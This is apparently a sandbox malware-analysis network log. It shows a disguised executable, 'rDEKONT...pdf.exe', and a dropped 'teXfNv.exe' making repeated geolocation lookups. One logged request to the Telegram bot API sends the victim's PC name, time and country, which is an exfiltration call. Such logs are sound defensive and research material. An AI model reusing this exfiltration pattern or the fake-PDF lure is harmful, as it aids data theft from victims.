                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322120
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=joI93meXYT0ObFWv4Z2hMc8oCIm84RfhncA67unF%2BCQDR1sWYiHdBBBLAqx51nw1qkQxtWGs6wf7rM4eQfj0y0E%2Fs1HnQLPirFgo3ox8ovFQnH3NozBinHFUOw7tQ1%2BupkQWdQl%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be52d79a5c358-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1483&rtt_var=587&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1818181&cwnd=155&unsent_bytes=0&cid=f7d23684933a8462&ts=137&x=0"
                                                                                                                                                        2025-01-16 06:02:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        10192.168.2.449753104.21.64.14437656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:11 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2025-01-16 06:02:11 UTC857INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:11 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322120
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bq%2Fpd5BC0ObscfKh5sVkKdTEldeX4%2FcWElrxYu%2F%2FcfQpkjOFylJEj3VfjJpWUNkbs40oj9dFcQKqDORw9VInQdbx7HgEKkM7t4yziiMfVr3JZlyjv4QxuVEPOOcBaHcMouq52NgX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be52d990642e9-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1663&rtt_var=635&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1708601&cwnd=241&unsent_bytes=0&cid=1c767e8ae7b21c9e&ts=143&x=0"
                                                                                                                                                        2025-01-16 06:02:11 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        11192.168.2.449757104.21.64.14438008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:12 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2025-01-16 06:02:12 UTC859INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:12 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322121
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zc3WZLDXRVsaZ%2Fyzh0dawXYO00r4cmNcVmv%2B5WeKzSI73xc3adnY0UV4m8OY1Fx162A2YWAxwHVdHobISpIsWNkDLZLek%2Fi1B3j99aH7gAhk47hvjySe9qww0%2Bn7%2F6dj6erJTbWW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be535999cde95-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1446&min_rtt=1440&rtt_var=553&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1957104&cwnd=246&unsent_bytes=0&cid=a0e91d739a6ec534&ts=132&x=0"
                                                                                                                                                        2025-01-16 06:02:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        12192.168.2.449758104.21.64.14437656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:12 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2025-01-16 06:02:12 UTC855INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:12 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322121
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BW%2FjZ38OAlhiF4%2BjQVq1tiykqoic7ynC1zQn36f6APSyKrdxFBH7XYKoeA2eZtSXkBG2w5ktvsjEmbmUnFBjh5dcbuo8b9Q9DhHP19y3cdZvRGWWjub3VfcrZthvsX97oeu%2FuALi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be535adf442e9-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1722&rtt_var=667&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1615938&cwnd=241&unsent_bytes=0&cid=e5f2d2bbeccc2cc8&ts=146&x=0"
                                                                                                                                                        2025-01-16 06:02:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        13192.168.2.449762104.21.64.14438008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:13 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2025-01-16 06:02:14 UTC867INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:14 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322123
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SAaQTu6Og5c5yKsbeVA%2BC%2B1qR2xbUNjmrdKUDp%2F6j3Pd%2B4elFTEa8tlpsnm%2Fh9OmK82SpUdyGQf%2Fe97WP1KyfotL%2FyX0Eu8rfTKzUDyLw1bsg2%2Bbgdf1YwbilBb%2FtiNgU00k6rgx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be53daa8842e9-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1691&rtt_var=656&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1641371&cwnd=241&unsent_bytes=0&cid=102b25766137e6eb&ts=148&x=0"
                                                                                                                                                        2025-01-16 06:02:14 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        14192.168.2.449761104.21.64.14437656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:13 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2025-01-16 06:02:14 UTC859INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:14 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322123
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xjNopCLCQ7B34QK1u%2B0l1FuHIltUvJ6tT0rSoLxDiYmvY4EsNpeehcBFLbihYFcMLp%2BUSZ6xEa%2BQpQQD20ps%2BhEfNxrQCJzVJcq4qkJZBYkxRl1%2FreX0q0JJpVget55dcf6qr4qd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be53daa8942e9-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1687&rtt_var=645&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1682027&cwnd=241&unsent_bytes=0&cid=6dc9dc2fa3b30db8&ts=134&x=0"
                                                                                                                                                        2025-01-16 06:02:14 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        15192.168.2.449764149.154.167.2204437656C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:14 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2016/01/2025%20/%2013:16:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2025-01-16 06:02:15 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:14 GMT
                                                                                                                                                        Content-Type: application/json
                                                                                                                                                        Content-Length: 55
                                                                                                                                                        Connection: close
                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                        2025-01-16 06:02:15 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        16192.168.2.449765104.21.64.14438008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:15 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2025-01-16 06:02:15 UTC859INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:15 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322124
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bu7f4NcVAJkeN9k8XJKBpCuIfKveETh1SB7qoY%2FM351SOxAlR3Jf47RG7d8Qj%2BOvOqjM33nIcsLTpl%2BJhNP0c%2FV%2BfB5iFPcJB2hW1asBn0r4AF1nu5BD6nCViLyAxQAtM0bS1Hci"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be545fffb42e9-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1666&rtt_var=646&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1666666&cwnd=241&unsent_bytes=0&cid=1dc52bb57a6191fd&ts=144&x=0"
                                                                                                                                                        2025-01-16 06:02:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        17192.168.2.449769104.21.64.14438008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:16 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        2025-01-16 06:02:16 UTC855INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:16 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322125
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q%2BdEL6MQWEfmVnEs5n3WiA5QnpxCC%2B46ivIispnn1BKffqRoMd2oakFOhUvnSx8fjiECPjG9w8pK1KZdcmSYf8qvEXUchFvk20RwjAvcggaKH3XwN8WjSa5tvYeeEPHA3m%2FsGFPT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be54e48dbc358-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1500&rtt_var=573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1893644&cwnd=155&unsent_bytes=0&cid=94ad9cb63f591ea6&ts=151&x=0"
                                                                                                                                                        2025-01-16 06:02:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        18192.168.2.449774104.21.64.14438008C:\Users\user\AppData\Roaming\teXfNv.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2025-01-16 06:02:17 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        2025-01-16 06:02:18 UTC857INHTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:18 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322127
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ge3xx67m4HjgIYCxLIgYhXaXx4P2HnFuSt3aYHnqrAoa74YH%2B%2Bj8nziW%2BrSOyZlhPh3TrWXzG4cw85qJFPjflQJZ0fk64JHks6UYvBqtWPSfY8vrCGfM773%2FQaUKakCgP1cCxQdq"}],"group":"cf-nel","max_age":604800}
